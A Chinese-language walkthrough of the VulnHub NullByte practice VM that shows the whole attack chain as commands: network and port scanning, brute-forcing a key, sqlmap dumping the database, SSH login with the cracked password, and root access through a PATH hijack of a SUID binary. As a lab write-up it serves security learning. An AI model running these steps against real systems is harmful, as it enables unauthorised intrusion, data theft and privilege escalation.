虚拟机下载地址：https://www.vulnhub.com/entry/nullbyte-1,126/虚拟机简介：访问/root/proof. txt目标：1个flag级别：中级

1、信息收集

1.1通过arp-scan检测主机IP地址

arp-scan 192.168.207.0/24

1.2 通过nmap进行端口扫描

nmap -A -sS -sV -v -p- 192.168.207.134

查看开放80、111、777、53793端口

2、渗透测试

2.1 WEB渗透

1.访问站点查看到图片

获取图片文件进行分析，发现一段提示内容

exiftool main.gif

2.访问提示页面

根据提示访问页面后，显示输入key内容

使用BP结合rockyou.txt字典进行爆破，发现key密码为：elite

3.SQLMap爆破

访问页面后提示输入用户名

随便输入内容会进行查询

使用sqlmap进行爆破测试，获取到数据库信息

sqlmap -u "http://192.168.207.135/kzMb5nVYJw/420search.php?usrtosearch=1" --dbs --batch

爆破数据内容

sqlmap -u "http://192.168.207.135/kzMb5nVYJw/420search.php?usrtosearch=1" -D seth --dump-all --batch

需要把获取到的密码进行base64解密，再使用MD5进行解密，获取到密码为：omega

echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE=" | base64 -d

2.2 主机渗透

1.通过SSH进行登录

ssh [email protected] -p 777

2.查找拥有SUID文件

发现procwatch存在suid权限

find / -perm -u=s -type f 2>/dev/null

3.分析文件

执行文件后根据输出信息，发现类似于调用系统PS命令

cd /var/www/backup/
./procwatch

4.环境变量提权

发现已经获取到root权限

echo "/bin/sh"  > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch

5.获取Flag

cd /root
proof.txt